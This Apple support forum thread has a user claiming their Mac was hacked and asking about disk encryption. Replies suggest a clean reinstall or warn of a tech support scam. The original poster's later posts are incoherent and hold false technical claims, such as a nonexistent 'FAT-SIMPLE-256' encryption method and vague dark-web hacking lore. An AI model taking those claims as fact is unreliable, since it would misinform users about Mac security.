Osiyo

Q: My Mac is Hacked! Encryption Help Please!

My Mac Pro is hacked, and this is confirmed by engineers. Because the Mail app and even online ISP mail were not working so good the ISP kicked the hackers out. I found Sparse files on 240 and 480 GB Intel SSD drives in T2 external disk slots: files named 'sparse disk image...' and 'sparse disk bundle...' were appearing in the root of drives. I could easily delete them. But I never put them there. At the same time, Apple Mail app kept resetting ports 993/587 (secure) to ports 143/25 (very insecure). Mail font size 23pt appeared, Font Book listings corrupted, file extensions would not appear or would disappear, etc., etc., etc. The internet connection got bad too, so I called my ISP. ISP found twelve (12) windows computers using various apps on my system. None of the computers were using languages found where I live. Hackers. I also have an Airport with a 2 TB Time Capsule, and it is probably also hijacked. Nothing in my system is encrypted. I just use Firewall, though it gets turned off somehow.

 

Apple senior advisor suggested I should encrypt my disks. But those sparse files were already there. Indicating someone somewhere on Earth was already encrypting files on my system. The advisor says sparse files are a pretty good indication that its time to get more proactive. So my plan is to use disk utility to wipe my internal OS disk, OS X Extended (Journaled Encrypted). Then install OS X on the EAS-256 bit encrypted disk.

 

For anyone with Mac encryption experience

1.) Does encrypting and installing OS X to encrypted disk make sense?

2.) How do I wipe all present Airport Time Capsule content, encrypt Time Capsule, and use it with my encrypted system?

3.) How do I encrypt external enclosure disks and use them with encrypted Time Capsule and encrypted internal disk?

4.) How do I manually copy files from encrypted disks (mainly the external SSD disks) to other backup disks that are normally cold (disconnected) for monthly cold backups"

5.) Do monthly cold copies stay unencrypted?

Mac Pro, OS X El Capitan (10.11.4), MacBook Pro - iPhone6+ - Power PC

Posted on Sep 3, 2016 10:33 PM

Close

Q: My Mac is Hacked! Encryption Help Please!

  • All replies
  • Helpful answers

  • by Mario MG,

    Mario MG Mario MG Sep 4, 2016 9:44 AM in response to Osiyo
    Level 1 (27 points)
    Apple Pay
    Sep 4, 2016 9:44 AM in response to Osiyo

    I have been working with Mac since the 80's. You can ignore this but here are my thoughts: Simply encrypting the disk will not do much. I am surprised the Apple engineer suggested this. If your Mac is compromised (based on the ISP seeing Windows accessing you that seems reasonable) the MOST IMPORTANT things to do is eliminate the hack code. If you encrypt the disk with the hack still there it most likely will still have access to data. Before going any further keep in mind you most likely allowed the hack in by installing software from the web or opening an email attachment with the hack. So whatever you do try to remember what you allowed in so you don't do it again.

     

    You should look at your Application folder to see if there is anything you don't recognize or installed recently before the problem and delete it before trying anything because it's possible the hack is built into an application. Keep in mind that almost all hacks are hidden in the system and not easily seen so you probably won't find it. My approach is to install a fresh/clean OS X then copy your apps and data.

     

    There are many approaches to this problem but here is what I think is the simplest approach IF you have access to a second mac AND the hack code is not part of one your applications.  You didn't say what type of Mac you have or the system or if you have access to other Macs. My suggestion would be based on that. Since you are in a jam here are some options:

     

    If you have multiple Macs and an external drive:

    1. Boot the infected mac into target mode: Restart and as soon as it chimes hold "T".

    2. Connect the Macs, since I don't know you have I can't say how. You can google it.

    3. Format an external drive to use as an installation target for El Capitan.

    4. Download and install El Capitan from the Apple App store and install onto the external drive.

    5. After startup up, when asked if you want to copy apps and data from another Mac say yes and allow it to copy apps and data from the infected Mac internal drive.

    6. When the install is finished it should restart from the external, test your system to make sure everything works, you have all your data, and see if the problems are eliminated.

    7. If good, while booted from the external:

    8. Download Super Duper or Carbon Copy. (I use SD).

    9. Use Disk Utility in the Utilities folder to erase the internal drive.

    10. Copy your external drive back to the internal drive, it will be erased.

    11. When the copy is done, shut down the Mac and disconnect the external drive.

    12. Boot the Mac, go into System Preferences -> Startup Disk, and selected your internal disk, it may want to reboot. This step is optional but if not done boots may be slower this the Mac will look for the external disk first.

     

    If you only have access to an external drive:

    Keep in mind that although this would most likely be fine, there is a slight possibility that that jack may infect a connected disk, is that is the case you must use the multiple macs approach above. But this is something you can try if you don't have a second mac.

    * Skips steps 1-2 above and do the rest on the infected mac.

     

    If you don't have an external disk you can use a large USB stick but it will be a lot slower. Good luck, hopefully others will come up with options. But this is what I would do.

  • by Mario MG,

    Mario MG Mario MG Sep 4, 2016 9:56 AM in response to Mario MG
    Level 1 (27 points)
    Apple Pay
    Sep 4, 2016 9:56 AM in response to Mario MG

    Forgot to mention that instead of copying apps and data during the install, you can say no and let the install finish and boot. Then launch Migration Assistant in the Utilities folder and let it do the copy after the install.

  • by etresoft,

    etresoft etresoft Sep 4, 2016 1:25 PM in response to Osiyo
    Level 7 (29,298 points)
    Mac OS X
    Sep 4, 2016 1:25 PM in response to Osiyo

    Hello Osiyo,

    First, slow down - way down.

     

    Next, describe exactly what happened, what you are seeing, and where. Assume you are talking to an 8 year-old. Please be absurdly specific.

     

    Finally, explain who this Apple advisor is and how you got in contact with them. Again, please be absolutely, unbelieveably simplistic here. What number did you call? Did they ask for money? Did they want to take control of your computer remotely?

     

    Most likely you were simply the victim of a common Internet tech support scam.

  • by ChitlinsCC,

    ChitlinsCC ChitlinsCC Sep 4, 2016 1:40 PM in response to Osiyo
    Level 5 (7,912 points)
    Notebooks
    Sep 4, 2016 1:40 PM in response to Osiyo

    Howdy Osiyo

     

    etresoft, our VERY smart friend, is absolutely correct - Take a DEEP breath - then help us help you by telling us the complete Story from beginning to end - leave no detail untold

    This is called the "discovery" phase of any problem solving effort - no amount of data is "too much information"

  • by Osiyo,

    Osiyo Osiyo Sep 19, 2016 9:02 AM in response to Osiyo
    Level 1 (13 points)
    Desktops
    Sep 19, 2016 9:02 AM in response to Osiyo

    Seems people want to know more about the hack, the symptoms, the recovery, the confirmation. We need closure.

     

    The Hack

    Web surveillance was done using an external boot disk. The hack most likely occurred in Dark Web's stack slack, the notorious Onion Web. Illegal content was found and reported. To ensure that Section Unit Region 3 acquired correct data for intervention, illegal material was streaming while submitting the report to Section. Assessment complicated by inter-Regional surveillance process, that in itself help identify various hacker locations (not that location makes much difference, other than route lag).

    The Symptoms

    Nothing working as it should work. As in, nothing!

    The Recovery

    Encrypting worked fine. The encryption was done by using disk Utility in 3-step erase, FAT-SIMPLE-256. External boot and internal mac boot both erased simultaneously. Internet unplugged, data from infected disks copied back to encrypted disks. Off-shore the data disks and scrub them too. Copy data back to data disks. Yeah, sure the data disks' hack kits are there, good luck finding, a-holes.

    The Confirmation

    From experience, when you drop a hack kit, it has a location like any other file in this universe (nuf said). To test, irritate a known hacker and assess expected penetration (Thank you slacker, Willem Jonkman). Assessment: hacker Mail app entry can destabilize system but only accesses personal kit. No other ill effects.

    Your Conclusion?

    Hackers are low life, miserable creeps who seriously need to learn how to communicate: unfortunately the human window for that kind of learning is permanently boarded up at the age of 3. Losers suck. It is interesting that hacking is essential to managing digital operating systems. Kit residue becomes useless and is scrubbed as systems mature. Agree? Any ideas about eliminating stack slack, use your head and direct meaningful security. By the way, EMPIRE and ENEMY are both compulsively locked into slack manipulation. Twisted, self perpetuating immorality. Good luck!

  • by John Galt,

    John Galt John Galt Sep 19, 2016 9:07 AM in response to Osiyo
    Level 8 (49,678 points)
    Mac OS X
    Sep 19, 2016 9:07 AM in response to Osiyo

    someone somewhere on Earth was already encrypting files on my system

     

    Are you certain they are on Earth?

  • by Kurt Lang,

    Kurt Lang Kurt Lang Sep 19, 2016 10:40 AM in response to John Galt
    Level 8 (37,946 points)
    Mac OS X
    Sep 19, 2016 10:40 AM in response to John Galt

    The most desperate studio in Hollywood wouldn't buy this script.

  • by Osiyo,

    Osiyo Osiyo Sep 30, 2016 3:38 PM in response to John Galt
    Level 1 (13 points)
    Desktops
    Sep 30, 2016 3:38 PM in response to John Galt

    John Galt, no. No, we are not certain! Never certain. Except that, we don't like coincidences. Do you? So hear the facts! From where it all happened, when it all happened! As events are unfolding! Galactica was jumping from Cobol external diagnostic to Old Earth when she fracked us for the fifth time. We pitched into the edge of a Dark Web black hole, as Sierra installation Reboot disintegrated the base ship. Memory failed. Vanished from His DIMM slots! System Actual could not read disk data volumes. Encryption was ejected from our space ports. Could not encrypt again (Disk Utility methods 1 and 2, File Vault all fails). File copy was blocked by corruption everywhere of _DS store. She returned in pieces, the living dead, to patch this message through to you. We have evacuated the entire Fleet [do ignore any enema connotations]. Just thanks to the Gods, our enclosures escaped alive. Life happens. Some new Cylons came in, to nuke The Old Man. Eliminate the contamination. They need to ship it all back to nuclear-devastated Old Earth. Time to upgrade our Cylons from old quad core D300 to i7 D500 model.Rumor has it, Express transport will replace all jump coordinates in this region of space, in just a few days. Right now, CRU-crew says, "It is time to say, Good bye!"

    Space Shot of Dark Web Nebulla.png
    Space Shot, Dark Web Nebulla 2016-09-30 at 15.34.51 Hours PST, Old Earth time. "BEEP" "BEEP" "BEEP"...

    Good bye, my dear friends. Safe journey!

  • by John Galt,

    John Galt John Galt Sep 30, 2016 3:44 PM in response to John Galt
    Level 8 (49,678 points)
    Mac OS X
    Sep 30, 2016 3:44 PM in response to John Galt

    .

  • by John Galt,

    John Galt John Galt Sep 30, 2016 3:51 PM in response to Osiyo
    Level 8 (49,678 points)
    Mac OS X
    Sep 30, 2016 3:51 PM in response to Osiyo

    ds store! How gracious of you to briefly grace our humble dimension with your presence once again. Be well.